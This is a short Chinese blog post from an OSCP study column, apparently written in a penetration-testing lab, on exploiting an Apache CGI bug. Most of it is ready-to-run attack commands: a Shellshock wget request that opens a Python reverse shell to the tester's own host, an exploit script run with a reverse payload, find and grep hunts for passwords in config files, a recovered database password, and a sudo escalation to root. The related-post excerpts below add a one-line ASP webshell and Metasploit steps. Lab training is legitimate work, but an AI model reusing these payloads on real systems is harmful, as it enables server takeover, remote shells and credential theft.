渗透测试网络攻防-apache cgi漏洞利用

于 2021-11-05 11:26:44 发布 430 收藏
分类专栏: OSCP 文章标签: 网络 网络攻防 渗透测试 安全攻防 红蓝对抗
辛苦原创,请勿盗取。
本文链接:https://blog.csdn.net/shuryuu/article/details/121159532
版权

cgi-bin 扫描路径暴露出:/cgi-bin/ 

wget -qO- -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.11.0.243\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' 2>&1" http://10.11.1.71/cgi-bin/admin.cgi 

或者 

searchsploit --color apache cgi 

python exploits/linux/remote/34900.py payload=reverse rhost=10.11.1.71 pages=/cgi-bin/admin.cgi lhost=10.11.0.243 lport=2222 

find . -name '*config*' -exec grep -iR -e 'password.*=' /dev/null {} \; 

find / -name '*config*' 2>/dev/null | xargs -l10 egrep 'passwd|password' 2>/dev/null 寻找config文件里的passwd,然后得到$bigtree["config"]["db"]["password"] = "zaq1xsw2cde3"; 

登陆gibson用户,之后sudo su直接变成root用户,或者sudo passwd root更改密码登陆 

白夜鬼魅
关注
专栏目录
AutoRecon:AutoRecon是一个多线程网络侦察工具,可以执行服务的自动枚举
05-13
就像用保险杠打保龄球一样。 - 自动侦察 AutoRecon是一种多线程网络侦察工具,可以执行服务的自动枚举。 它旨在用作节省时间的工具,用于CTF和其他渗透测试环境(例如OSCP)。 在现实世界中参与也可能很有用。 该工具通过首先执行端口扫描/服务检测扫描来工作。 根据最初的结果,该工具将使用许多不同的工具对这些服务启动进一步的枚举扫描。 例如,如果找到HTTP,则将启动nikto(以及许多其他命令)。 该工具中的所有内容都是高度可配置的。 默认配置不执行任何自动利用,以使工具与OSCP考试规则保持一致。 如果您希望向配置中添加自动利用工具,则后果自负。 对于因滥用该工具而导致的负面行为,作者概不负责。 起源 :AutoRecon是由三个工具,其在OSCP实验室使用的作者灵感, 和 。 虽然这三个工具都很有用,但三个工具都没有一个具有所需的功能。 AutoRecon结合了上述工具的
什么是cgi漏洞
Praifire的博客
11-16 3818
CGI是Common Gateway Inerface(公用网关接口)的简称,并不特指一种语言。Web服务器的安全问题主要包括:1)Web服务器软件编制中的BUG;2)服务器配置的错误。可能导致CGI源代码泄漏,物理路径信息泄漏,系统敏感信息泄漏或远程执行任意命令。CGI语言漏洞分为以下几类:配置错误、边界条件错误、访问验证错误、来源验证错误、输入验证错误、策略错误、使用错误等等。CGI漏洞大多分
参与评论 您还未登录,请先 登录 后发表或查看评论
一次成功的cgi漏洞入侵
04-19
网站安全包括许多方面,尽管网管们千方百计的防范于未然,可有时还是难免疏漏。 我的“再谈cgi漏洞攻击”一文中,我利用cgi漏洞攻进几台服务器,这次我将以一次,从发现漏洞利用漏洞, 从而攻进主机的全过程来讲解,与大家交流。
实战攻击-永恒之蓝
网络安全领域优质创作者
11-05 509
nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.7-oX 10.11.1.7.xml 格式转换:xsltproc-o118.190.244.96.html118.190.244.96.xml ms08-067 方案一: msfconsole search ms08-067 use exploit/windows/smb/ms08_067_netapi show payloads set ...
Apache 中间件漏洞(换行解析)详解
xinyue9966的博客
02-17 2419
介绍 Apache(音译为阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将Perl/Python等解释器编译到服务器中。 简而言之,Apache服务器不仅简单好用,还能支持HTML、PHP、Perl、Python等基础语言。 目录介绍 bin-------存放常用的命令工具,例如httpd cgi-bin---存放Linux下常用的命令,例如xxx.sh co
php cgi漏洞,CGI漏洞攻击合集上
weixin_42515739的博客
03-13 478
Filename: README.patch.3018Algorithm #1 (sum -r): 37955 11 README.patch.3018Algorithm #2 (sum): 15455 11 README.patch.3018MD5 checksum: 1169EB51D75E0794C64C2C1FD6211B69Filename: patchSG0003018Algo20. ...
web服务器/中间件漏洞系列4:apache漏洞汇总
最新发布
qq_45590334的博客
11-30 703
apache 简介: Apache 是世界使用排名第一的Web 服务器软件。它可以运行在几乎所有广泛使用的 计算机平台上,由于其 跨平台 和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将 Perl/ Python等 解释器编译到服务器中。 一、多后缀名解析漏洞 复现环境: docker : vulhub/httpd/apache_parsing_vulnerability 1、漏洞简介 漏洞成因: Apache文件解析漏洞与用户的配置有密切的关系,严格来说属.
史上最全的渗透测试面试题,都是干货。
m0_48368237的博客
01-30 3603
1、拿到一个待检测的站或给你一个网站,你觉得应该先做什么? 一、信息收集 1.获取域名的whois信息,获取注册者邮箱姓名电话等。 2.通过站长之家、明小子、k8等查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞。 3、通过DNS域传送漏洞、备份号查询、SSl证书、APP、微信公众号、暴力破解、DNS历史记录、K8 C段查询、Jsfinder、360或华为威胁情报、证书序列号获取企业域名与ip。 4.通过Nmap、Wappalyzer、御剑等查看服务器操作系统
CGI漏洞利用
热门推荐
矿野上的脚印
07-18 1万+
CGI漏洞利用CGI漏洞是网管最容易乎视的地方,就我测试的这个网站上的漏洞, 我简单说一下,几个常见的漏洞地方。一般原理,解决方法,如果没有写全,请参考一些文献。 1,名字:?PageServices漏洞 这个漏洞是很多网站都有的。但是有好多人扫描出来确不知道如何运用,在此我简单谈一下吧,! 这个是可以显示页面清单的 方法是url/?PageServices 还可以这样试试 ! /?wp-cs-d
Apache安全漏洞
qq_43665434的博客
05-10 3392
Apache安全漏洞 1、Apache中间件介绍 Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将Perl/Python等解释器编译到服务器中。 简单来说就是一个好用的,并且能支持基础的HTML、PHP、Perl、Python等语言。很强 常见目录: bin ------------- 存放常用的命令工具。例如httpd cgi-bin -------
Apache中间件漏洞深析
weixin_49340699的博客
08-16 99
Apache中间件漏洞深析Apache介绍运行原理介绍apche解析php流程Apache攻击手段换行解析漏洞多后缀解析漏洞SSI远程命令执行漏洞 Apache介绍 Apache是世界使用排名第一的服务器软件。快速可靠可通过简单的API扩充,将Per/Python等解释器编译到服务器中。 目录结构 bin ———————— 用于存放命令工具 如httpd cgi-bin —————— 存放Linux下的常用命令 conf
上传漏洞之解析漏洞(iis、apache、php cgi)
EC_Carrot的博客
11-12 225
解析漏洞IIS解析漏洞基于IIS容器的WebDav漏洞Apache解析漏洞PHP CGI解析漏洞 IIS解析漏洞 一. IIS6.0在解析文件时,存在解析漏洞,当建立*.asa和*.asp格式的文件夹是,其目录下任意文件都被当作asp文件来解析。 二. 在IIS6.0中,当文件为*.asp;1.jpg时,同样会被当作asp文件解析,微软不认为这是漏洞,也没有推出它的补丁,所以该漏洞至今还存在。 基于IIS容器的WebDav漏洞 它扩展了HTTP协议,在原有的GET、POST、HEAD等几个HTTP标准方法以
CGI安全漏洞资料速查
eternalee的专栏
10-08 2509
    ############################################################################# 本文取自一位朋友.这本来不算是什么珍贵的东西,如果你平时注意收集的话,相信很多人都会有比这份更全面、更好的资料.但由于某些原因.这些资料一直都不肯被公开.但我是一个崇尚完全自由、完全开放、完全共享的little guys.所以我把这份资
Apache HTTP Server路径穿越漏洞复现(CVE-2021-41773)
小小猪的博客
10-26 887
sudo docker pull blueteamsteve/cve-2021-41773:no-cgid sudo docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
JAVA CGI 远程代码执行_Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现
weixin_32018297的博客
02-27 91
一、 漏洞简介漏洞编号和级别CVE编号:CVE-2019-0232,危险级别:高危,CVSS分值:官方未评定。漏洞概述Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。4月11日,Apache官方发布通告称将在最新版本中修复一个远程代码执行漏洞(CVE-2019-023...
漏洞扫描器CGI漏洞攻击手册
wangcheng711@gmail.com
04-11 1909
1.carbo.dll iCat Carbo服务器一个网络购物程序,它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞,这个漏洞让我们每个人查看系统中的任何文件在(除文件之外和一些特殊字符). 攻击方法: 提交这样的http请求 : http://host/carbo.dll?icatcommand=fi
HTTPoxy CGI应用程序漏洞(CVE-2016-5385)
willow_liang的博客
04-15 421
CGI简介 CGI(Common Gateway Interface)公共网关接口,是外部扩展应用程序与 Web 服务器交互的一个标准接口。服务器端与客户端进行交互的常见方式多,CGI 技术就是其中之一。根据CGI标准,编写外部扩展应用程序,可以对客户端浏览器输入的数据进行处理,完成客户端与服务器的交互操作。CGI规范定义了Web服务器如何向扩展应用程序发送消息,在收到扩展应用程序的信息后又如何进行处理等内容。对于许多静态的HTML网页无法实现的功能,通过 CGI可以实现,比如表单的处理、对数据库的访问、
[cgi-bin] 30个漏洞+使用方法
weixin_33782386的博客
04-03 1066
/smspass.plusername=username&password=password/index.cgiwei=ren&gen=command/passmaster.cgiAction=Add&Username=Username&Password=Password/accountcreate.cgiusername=username&password...
IIS6.0,Apache低版本,PHP CGI 解析漏洞
weixin_30954265的博客
07-28 311
IIS6.0解析漏洞 在IIS6.0下存在这样的文件“名字.asp;名字.jpg” 代表了jpg文件可以以asp脚本类型的文件执行。 根据这个解析漏洞我们可以上传这种名字类型的图片,比如 1.asp;xxx.jpg 他会忽略;后边的内容,所以文件相当于1.asp asp一句话木马 <%eval request ("pass")%> 找到上传的路径后,可以直接用菜刀连接。如果对文...
黑客通过linux bash漏洞借助apache cgi向产品服务器植入木马病毒的实例分享!
sidongxue2的专栏
01-24 3684
黑客通过linux bash漏洞借助apache cgi向产品服务器植入木马病毒的实例分享!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:猿与汪的秘密 设计师:我叫白小胖 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值